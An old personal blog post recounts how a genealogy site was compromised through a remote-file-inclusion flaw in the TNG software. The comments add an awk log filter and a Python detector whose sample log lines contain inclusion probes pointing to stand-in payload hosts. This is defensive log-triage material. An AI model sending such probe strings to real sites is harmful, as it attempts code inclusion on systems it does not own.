My non-blogging site, rjmaguire.com, that mainly hosts my genealogy stuff, was hacked recently. The perp found a security hole, published in underground circles, in the 3rd-party genealogy software I use called TNG: The Next Generation. I found a message on their support forums that describes how to close the hole, and it is now closed. I’ve also replaced the damaged file (as they at least were kind enough to only do a minimal amount of damage).
I don’t blame the author of the software or the PHP programming language. It was an easy mistake to make. I still intend to use the software (and even upgrade to the newest version). It was my own fault for not keeping a closer eye on the server logs and on the TNG mailing list to notice that this kind of thing was going on.
I haven’t actually been able to pinpoint the exact day or time when the hack occurred. The first attempts began in mid-March. I don’t think the hack actually occurred until just a few days ago, when I noticed the page on my site was posted in a Spanish-language forum as a badge of honour as it were. Thankfully, the kids trying this stuff out aren’t really that bright, as witnessed by a lot of failures to even copy and paste correctly.
One of them actually managed to copy a couple of executables that looked like IRC server software or something, but was undoubtedly stopped cold when it had no chance of running on my server’s architecture.
These are the IPs of the machines from which these kiddies attempted their hacks, followed by the URLs where they hosted their payloads:
Update (18 Jul 2007): I’ve created a quick and dirty live feed of hack attempts and the external links from where the attack scripts are being hosted, seeing as I’m still getting the odd attempt now and then…
Update (15 Sep 2007): List removed since it’s grossly out of date.
8 Comments
Bob, sorry to hear about the hack. How exactly did you notice that site was posted in a Spanish-language forum? Do you Google your site on a regular basis?
Someone clicked on the link and visited my site to see the evidence, so it ended up in my logs as a referer link.
I saw attempts for this as well and decided to comb my logs for more occurrences. I hacked out this ugly multi-part awk monstrosity to dump the results from the various logs to a file:
cat /var/log/default.access.log | awk '{print $1," – ",$4," – ",$12," – ",$7}' | awk '/.*\?$/' > attackers-wiki.txt
I’m sure someone with greater awk skillz can make it nicer…
One interesting thing I noticed was that one of the files they try to run attempts to disable the safe-mode option in PHP.
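The awk one-liner above keys on requests ending in a bare "?", which is what these remote-file-inclusion probes look like when a script parameter is pointed at an attacker-hosted file. Here is an added example (not code from the post or from TNG) that does the same triage more deliberately: it parses Apache combined-format lines, flags any query parameter whose value is an absolute URL to a host you do not own, and lists the hosts serving the payloads. The log lines, paths, parameter names and hostnames are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache "combined" format; nothing here is from the post's real logs.
# Lines 1 and 3 are RFI probes (parameter value is an external URL, trailing "?" as in the awk
# filter); line 2 is an ordinary page view; line 4 carries a URL back to our own host.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Mar/2007:02:11:09 +0000] "GET /genealogy/page.php?cfg=http://evil.example/s.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.2 - - [14/Mar/2007:02:12:41 +0000] "GET /genealogy/person.php?id=I12&tree=t1 HTTP/1.1" 200 9012 "http://rjmaguire.com/" "Mozilla/5.0"
203.0.113.9 - - [15/Mar/2007:11:03:55 +0000] "GET /genealogy/index.php?inc=https%3A%2F%2Fpayload.example%2Fr.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
198.51.100.5 - - [15/Mar/2007:11:04:10 +0000] "GET /genealogy/login.php?return=http://rjmaguire.com/genealogy/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def find_rfi_attempts(log_text, own_hosts=("rjmaguire.com",)):
    """Return one record per request whose query string carries an absolute URL
    to a host we do not own, the signature of a remote-file-inclusion probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes values, so "https%3A%2F%2F..." is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            remote = urlsplit(value)
            if remote.scheme in ("http", "https", "ftp") and remote.hostname \
                    and remote.hostname not in own_hosts:
                hits.append({"ip": m["ip"], "time": m["ts"], "param": name,
                             "payload_host": remote.hostname, "status": m["status"]})
    return hits

def payload_hosts(hits):
    """Distinct hosts the attack scripts were pulled from, sorted for reporting."""
    return sorted({h["payload_host"] for h in hits})

if __name__ == "__main__":
    found = find_rfi_attempts(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]} - {h["time"]} - {h["param"]} -> {h["payload_host"]} ({h["status"]})')
    print("payload hosts:", ", ".join(payload_hosts(found)))
```

A 404 on the inclusion request does not mean the probe failed; the status refers to the local page, so the pulled-in script may still have executed.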
[...] Several people have encountered the same and have been successfully hacked. The script is uploaded somewhere else and being pulled up from the target site. Your error logs might display this as such: [...]
I have visited your site 368 times
What a coincidence. I have visited yours 0 times.
FYI – there are sites and IPs included in your mega list that were hacked also and then used unknowingly for brief periods until the owners/administrators were able to shut down the exploits in the same or similar ways that you were able to do. Only now when those domains are searched they get your blog that associates them with hacking exploits… not great. In other words, someone else could have done a similar list with your domain on it because of the hack on your site. My point is that publishing these lists without fully understanding what you are publishing (pardon me if you do) results in potential damage to others who suffered the exact same assault that you did. I would like you to consider removing the list as I’m sure I am not the only one. Thanks. GZ
Sure. No problem. There’s been a considerable passage of time since then anyway.